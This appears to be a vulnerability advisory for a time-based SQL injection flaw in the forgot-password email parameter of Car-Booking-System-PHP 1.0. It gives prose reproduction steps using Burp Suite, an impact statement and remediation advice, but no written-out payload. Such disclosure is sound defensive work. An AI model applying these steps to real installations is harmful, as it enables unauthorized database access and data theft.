Car Booking System PHP SQL Injection Vulnerability in Forgot Password Feature

A SQL injection vulnerability has been identified in Car-Booking-System-PHP version 1.0, specifically within the forgot password feature. This vulnerability allows attackers to manipulate SQL queries, potentially leading to unauthorized database access, data exfiltration, information modification, and in some cases, code execution.

Impact

Exploitation of this vulnerability allows attackers to execute arbitrary SQL commands, potentially leading to unauthorized database access, data manipulation, and in some cases, code execution.

Reproduction

To reproduce this vulnerability, navigate to the forgot password section of the application. Enter an email address and intercept the request using Burp Suite. Send the intercepted request to the repeater and append a crafted SQL injection payload to the email parameter. The payload should be designed to exploit the application's SQL query handling, such as by using time-based injection techniques. After sending the modified request, observe the response time to confirm successful exploitation.

Remediation

To mitigate this vulnerability, use prepared statements and parameter binding to separate SQL code from user input, preventing injection attacks. Additionally, validate and filter user input to ensure it meets expected formats, and minimize database user permissions to limit potential damage from successful attacks.